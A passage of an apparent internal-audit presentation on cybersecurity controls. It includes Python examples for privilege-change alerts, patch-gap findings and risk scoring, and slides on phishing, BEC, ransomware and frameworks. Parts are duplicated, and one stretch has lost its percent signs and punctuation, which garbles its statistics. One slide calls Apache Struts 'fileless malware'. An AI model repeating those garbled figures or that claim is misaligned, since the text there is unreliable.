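    if not m:
        return None
    fields = {key: quoted if quoted else bare
              for key, quoted, bare in KV_RE.findall(m.group("rest"))}
    return {"ts": m.group("ts"), "event": m.group("event"), **fields}


def detect_privilege_changes(log_text: str = SAMPLE_LOG, watch_groups=PRIVILEGED_GROUPS) -> List[dict]:
    """Alert on every addition to a watched group; escalate when an actor adds themselves."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev or ev["event"] not in GROUP_ADD_EVENTS:
            continue
        if ev.get("group") not in watch_groups:
            continue
        reasons = [f"member added to privileged {GROUP_ADD_EVENTS[ev['event']]} group"]
        if ev.get("subject") and ev.get("subject") == ev.get("member"):
            reasons.append("actor granted the privilege to their own account")
        alerts.append({
            "time": ev["ts"],
            "actor": ev.get("subject"),
            "member": ev.get("member"),
            "group": ev.get("group"),
            "severity": "high" if len(reasons) > 1 else "medium",
            "reasons": reasons,
        })
    return alerts
```

For the audit, the questions are whether these three event IDs are being collected from every domain controller and member server, whether the watched-group list matches the privileged accounts found in the access inventory, and who receives and actions the alert.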
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker’s first entry point into the company
• Determine whether your company conducts random phishing awareness training campaigns
• Evaluate your company’s overall cybersecurity training and awareness program
CYBERSECURITY – WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
• Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
• Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched due to business reasons, determine whether those risks are formally accepted and tracked by management. Assess whether there are sufficient mitigating controls in place
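The vulnerability management checks above, joined up in code: an asset inventory, installed versions compared against vendor fixes, internet-facing devices and patches older than a year pushed to the top, and formally accepted risks tracked rather than lost. This is an added Python example, not code from the presentation. Software names, versions, advisory dates and hostnames are all constructed, and the waiver reference is a placeholder.

```python
from datetime import date
from typing import Dict, List, Tuple

# Constructed vendor advisories: installed versions below fixed_version need the patch.
ADVISORIES = [
    {"software": "Web Framework", "fixed_version": "2.5.0", "fix_released": date(2017, 3, 7), "severity": "critical"},
    {"software": "PDF Reader", "fixed_version": "11.2", "fix_released": date(2018, 1, 10), "severity": "high"},
    {"software": "Java Runtime", "fixed_version": "8.171", "fix_released": date(2018, 4, 17), "severity": "high"},
]

# Constructed asset inventory (hostnames and versions are made up).
INVENTORY = [
    {"host": "web-01", "internet_facing": True, "installed": {"Web Framework": "2.3.31"}},
    {"host": "ws-117", "internet_facing": False, "installed": {"PDF Reader": "11.0", "Java Runtime": "8.171"}},
    {"host": "vpn-gw", "internet_facing": True, "installed": {"Java Runtime": "8.151"}},
]

# Risks management has formally accepted, keyed by (host, software). Placeholder waiver id.
ACCEPTED_RISKS = {
    ("ws-117", "PDF Reader"): "legacy forms app; waiver <ticket-id placeholder>, expires 2019-06-30",
}


def parse_version(v: str) -> Tuple[int, ...]:
    """Dotted numeric version to a comparable tuple, e.g. '2.3.31' -> (2, 3, 31)."""
    return tuple(int(p) for p in v.split("."))


def patch_findings(inventory=INVENTORY, advisories=ADVISORIES, as_of=date(2018, 9, 1),
                   accepted=ACCEPTED_RISKS, stale_days=365) -> List[dict]:
    """Every installed version behind a vendor fix, prioritised for follow-up.

    P1 = internet-facing or fix available for more than stale_days; otherwise P2.
    """
    by_software: Dict[str, List[dict]] = {}
    for adv in advisories:
        by_software.setdefault(adv["software"], []).append(adv)
    findings = []
    for asset in inventory:
        for software, version in asset["installed"].items():
            for adv in by_software.get(software, []):
                if parse_version(version) >= parse_version(adv["fixed_version"]):
                    continue  # already at or beyond the fixed version
                days_open = (as_of - adv["fix_released"]).days
                key = (asset["host"], software)
                findings.append({
                    "host": asset["host"],
                    "software": software,
                    "installed": version,
                    "fixed_version": adv["fixed_version"],
                    "severity": adv["severity"],
                    "days_open": days_open,
                    "internet_facing": asset["internet_facing"],
                    "accepted": key in accepted,
                    "acceptance_note": accepted.get(key),
                    "priority": "P1" if asset["internet_facing"] or days_open > stale_days else "P2",
                })
    findings.sort(key=lambda f: (f["priority"], -f["days_open"]))
    return findings


def unaccepted(findings: List[dict]) -> List[dict]:
    """Findings with no formal risk acceptance: the audit exceptions to raise."""
    return [f for f in findings if not f["accepted"]]
```

Two things the output makes visible that a patch report alone does not: a host missing from the inventory produces no finding at all, which is the blind spot the slide warns about, and an accepted risk still appears with its waiver note so the acceptance can be checked for an expiry date and compensating controls.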
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device’s risk relating to patches
• Understand your company’s fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company’s cyber insurance policy
• Assess the requirement for multi-factor authentication
ANATOMY OF AN ATTACK

QUESTIONS
David Losacco, Principal – mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
4
INTRODUCTION TO A CYBER CRIMINAL
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC - PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k: a triggered review and customer communication uncovered a change in bank info (communication was being sent to a deleted email address)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables
Cash Disbursements
• SOD (segregation of duties): limit access to the vendor master file
• Controls over changing bank info for any vendor: require more than email communication; personally verify with the vendor requesting the change, using contact details already on file rather than those in the request
• Vendor set-up: verification of the information provided
• ISNetworld: vetting process for vendors; could require vetting prior to set-up as a vendor
• ACH debits: no reason to give debit access to the account; if it is done, dual approval and a ZBA (zero balance account) should be used
• Multi-factor authentication
Other Processes to Consider: Treasury, Payroll, Royalties
Also consider: Cyber Insurance, Legal Liabilities, Contract Language, SOX Impact
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
• Not all second factors are equal: a hardware security key only signs for the legitimate site's origin, so a look-alike phishing page cannot reuse it, whereas SMS and app-generated one-time codes can be relayed by the phishing page in real time
32
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach
The main reasons for companies' struggles are:
BARRIERS TO EFFECTIVE CYBERSECURITY
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
A defense-in-depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around the company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Areas to evaluate:
• Patch Management
• Operating System EOL (end of life)
• Network Vulnerability Scanning
• Security Staffing
• Internal & External Network Boundaries
• Wireless Security
• Firewall Implementation and Monitoring (including NextGen)
• IPS / IDS / SIEM Implementations
• Firewall Dataflow & Standards Documentation
• Cloud Service Provider Evaluations
• Security Incident Management
• Physical Security
• Evaluation of Encryption Technologies
• Network Access Control
• Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH: PEOPLE, TECHNOLOGY, PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGE: Ensure best-practice processes and the associated management frameworks are in place. Regular audits and reviews are important
35
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls that need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Cycle: Risk Assessments → Create a Baseline/Gap Analysis → Implement and Manage Controls → Assess & Report
36
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews with departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each asset type to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks: identify, estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
Key to an effective cybersecurity program is understanding the company's information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash-in / cash-out processes
• Who would want the data?
37
38
• Through formal risk assessments with all critical functions in the business, identify where data lives and how it should be classified, then perform a threat analysis to semi-quantitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
• Use the cybersecurity maturity baseline and the risk assessment results to identify and prioritize the controls to implement, starting with the highest-priority, most impactful controls
STEP 2 - BASELINE GAP ANALYSIS
39
40
41
• The baseline gap analysis facilitates the identification of the controls that will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
• Work with IT management to identify realistic and feasible mitigating controls and an implementation roadmap
Chart: MITIGATING CONTROL COUNTS (bar chart of how many high-risk system/threat pairs each candidate mitigating control reduces; the bar values did not survive extraction)
A) Identify information systems with a calculated cybersecurity risk > 100
B) Does the information system have a SPECIFIC THREAT with a cybersecurity risk over 100 (Yes/No)? If yes, move to the next step
C) Identify the mitigating controls to implement for that threat
D) Total all instances where each control reduced risk
STEP 3 - CONTROLS ANALYSIS
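Added example, not from the deck: a Python version of the Step 1 scoring and the Step 3 A-D control count above, run over a constructed, hypothetical set of three systems, six threats and six mitigating controls. The 1-5 scales, the "asset value x likelihood x impact" formula, the control-to-threat mapping and the cut-off of 100 are assumptions chosen to mirror the deck's "> 100" rule; a real assessment uses whatever scale the threat modeling tool produces.

```python
from collections import Counter

THRESHOLD = 100  # the deck's cut-off: a system/threat pair scoring over 100 gets a control

# Constructed, hypothetical inventory. Each threat carries (likelihood, impact) on a 1-5
# scale; asset_value is the 1-5 classification from Step 1. Maximum score = 5 * 5 * 5 = 125.
SYSTEMS = {
    "ERP": {"asset_value": 5,
            "threats": {"phishing": (5, 5), "ransomware": (5, 5), "ddos": (2, 2)}},
    "Marketing website": {"asset_value": 2,
                          "threats": {"sqli": (3, 3), "ddos": (4, 2)}},
    "Payroll": {"asset_value": 5,
                "threats": {"bec": (5, 5), "phishing": (4, 5)}},
}

# Hypothetical mapping of candidate mitigating controls to the threats each one reduces
CONTROLS = {
    "MFA on email": {"phishing", "bec"},
    "Phishing awareness training": {"phishing", "bec"},
    "Offline, tested backups": {"ransomware"},
    "Patch management": {"ransomware", "sqli"},
    "Web application firewall": {"sqli", "ddos"},
    "Callback verification for bank-detail changes": {"bec"},
}


def threat_scores(system):
    """Semi-quantitative risk per threat: asset value x likelihood x impact."""
    value = system["asset_value"]
    return {t: value * lik * imp for t, (lik, imp) in system["threats"].items()}


def systems_over_threshold(systems=SYSTEMS, threshold=THRESHOLD):
    """Step A: systems whose calculated risk for at least one threat exceeds the threshold."""
    return sorted(name for name, s in systems.items()
                  if max(threat_scores(s).values()) > threshold)


def threat_pairs_over_threshold(systems=SYSTEMS, threshold=THRESHOLD):
    """Step B: every (system, threat, score) pair that individually exceeds the threshold."""
    pairs = []
    for name, s in systems.items():
        for threat, score in threat_scores(s).items():
            if score > threshold:
                pairs.append((name, threat, score))
    return sorted(pairs)


def mitigating_control_counts(systems=SYSTEMS, controls=CONTROLS, threshold=THRESHOLD):
    """Steps C and D: for each over-threshold pair, find the controls that mitigate the
    threat and total how many pairs each control reduces. Controls that help no
    high-risk pair stay at zero, which is itself useful roadmap information."""
    counts = Counter({c: 0 for c in controls})
    for _, threat, _ in threat_pairs_over_threshold(systems, threshold):
        for control, covered in controls.items():
            if threat in covered:
                counts[control] += 1
    return counts


def prioritized_controls(systems=SYSTEMS, controls=CONTROLS, threshold=THRESHOLD):
    """Roadmap order: the controls that reduce the most high-risk pairs come first."""
    counts = mitigating_control_counts(systems, controls, threshold)
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for name, system in SYSTEMS.items():
        print(name, threat_scores(system))
    print("A) systems over threshold:", systems_over_threshold())
    print("B) system/threat pairs over threshold:", threat_pairs_over_threshold())
    print("C/D) mitigating control counts, highest first:")
    for control, n in prioritized_controls():
        print(f"  {n:2d}  {control}")
```

With these inputs the Payroll system's phishing threat scores exactly 100 and is therefore excluded by the strict "> 100" rule; whether the cut-off is "over" or "at least" is worth agreeing with IT before the counts drive the roadmap.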
42
• Leverage the information gained during the project to provide management with a detailed mapping of the organization's cybersecurity position
• Consider using the COBIT Process Capability Model to map out the CSC framework, which will allow management to begin tracking cybersecurity maturity
Capability levels (COBIT 5 Process Assessment Model):
5 = OPTIMIZING
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
0 = INCOMPLETE
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
• NIST SP 800-53 r5, Security and Privacy Controls for Information Systems and Organizations (earlier revisions were titled Recommended Security Controls for Federal Information Systems and Organizations)
• NIST Cybersecurity Framework v1.1
• Various other NIST special publications
Center for Internet Security
• Critical Security Controls (formerly the SANS Top 20)
International Organization for Standardization
• ISO/IEC 27001 family: information security management systems
ISACA
• Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matter? Companies with more than 10,000 employees are slightly more likely to have adopted a security framework (90%), but even smaller companies with fewer than 1,000 employees report significant rates of adoption (77%). Source: itgovernanceusa.com
According to Tenable's Trends in Security Framework Adoption Survey, 84% of organizations in the US leverage a security framework and 44% use more than one framework. Source: itgovernanceusa.com
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY - WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
• Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems. Don't just think SOX
• Confirm IT is not using privileged accounts for daily tasks such as browsing the internet or answering email
• Determine whether privileged and admin account passwords are held to a higher standard than normal accounts (complexity, length, change frequency, sharing)
• Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
• Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the attacker's first entry point into the company
• Determine whether your company conducts random phishing awareness campaigns
• Evaluate your company's overall cybersecurity training and awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management
• Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process
• Ensure your IT department is scanning all assets continuously so that newly discovered vulnerabilities are identified quickly
• Validate that the patch management process is effective in ensuring all IT devices are properly updated (patched) to the latest software update or release from the vendor. This includes workstations, servers, network equipment, VMware, Citrix, non-Microsoft software, etc.
• If known vulnerabilities cannot be patched for business reasons, determine whether those risks are formally accepted and tracked by management, and assess whether sufficient mitigating controls are in place
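Added example, not from the deck: one way an auditor can turn a scan export plus asset inventory into the findings the bullets above ask for (patch age per device, internet-facing assets outside their remediation window, findings open more than a year, and whether each open item carries a formal risk acceptance). The inventory, the device names and the 14-day/30-day remediation windows are constructed assumptions for illustration.

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Optional


@dataclass
class Asset:
    name: str
    kind: str                        # workstation, server, network, OT, printer ...
    internet_facing: bool
    patch_released: Optional[date]   # date the vendor published the fix for the oldest open finding
    patched: bool                    # has the fix been applied?
    risk_accepted: bool = False      # has management formally accepted the open risk?


# Constructed, hypothetical inventory (as a scanner export joined to the CMDB might look)
INVENTORY = [
    Asset("web01", "server", True, date(2018, 3, 7), False),
    Asset("fw01", "network", True, date(2018, 8, 20), False),
    Asset("hr-ws-14", "workstation", False, date(2017, 6, 1), False),
    Asset("scada-hmi", "OT", False, date(2016, 1, 15), False, risk_accepted=True),
    Asset("db01", "server", False, date(2018, 7, 1), True),
    Asset("print01", "printer", False, None, False),   # no finding: was it even scanned?
]

# Assumed remediation windows in days: internet-facing assets get the shorter one
SLA_DAYS = {True: 14, False: 30}


def days_outstanding(asset: Asset, as_of: date) -> Optional[int]:
    """Days a published fix has gone unapplied; None when nothing is outstanding."""
    if asset.patched or asset.patch_released is None:
        return None
    return (as_of - asset.patch_released).days


def classify(asset: Asset, as_of: date) -> str:
    days = days_outstanding(asset, as_of)
    if days is None:
        return "patched" if asset.patched else "no finding (confirm the asset was scanned)"
    if days <= SLA_DAYS[asset.internet_facing]:
        return "within SLA"
    if asset.risk_accepted:
        return "overdue, risk accepted"
    return "overdue"


def audit_findings(inventory: List[Asset], as_of: date) -> dict:
    """Group the inventory the way the workpaper presents it: the internet-facing
    exposures first, then anything older than a year, then what lacks a formal
    risk acceptance (an unaccepted overdue item is a control failure, an accepted
    one is a management decision to test for mitigating controls)."""
    report = {"overdue_internet_facing": [], "overdue_over_one_year": [],
              "overdue_not_accepted": [], "risk_accepted": [], "within_sla": [], "clean": []}
    for a in inventory:
        status = classify(a, as_of)
        days = days_outstanding(a, as_of)
        if status == "within SLA":
            report["within_sla"].append(a.name)
        elif status.startswith("overdue"):
            if a.internet_facing:
                report["overdue_internet_facing"].append(a.name)
            if days > 365:
                report["overdue_over_one_year"].append(a.name)
            if a.risk_accepted:
                report["risk_accepted"].append(a.name)
            else:
                report["overdue_not_accepted"].append(a.name)
        else:
            report["clean"].append(a.name)
    return report


if __name__ == "__main__":
    as_of = date(2018, 9, 1)   # assumed audit date
    for a in INVENTORY:
        print(f"{a.name:10s} {classify(a, as_of):40s} {days_outstanding(a, as_of)}")
    for key, names in audit_findings(INVENTORY, as_of).items():
        print(key, names)
```

The "clean" bucket deliberately includes assets with no finding at all: in a real engagement that list is cross-checked against network discovery, because a device the scanner never saw is the unknown-device problem the second bullet describes, not a pass.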
47
CYBERSECURITY - SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated (ransomware or an attacker that can reach the backups from the production network can destroy them too)
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
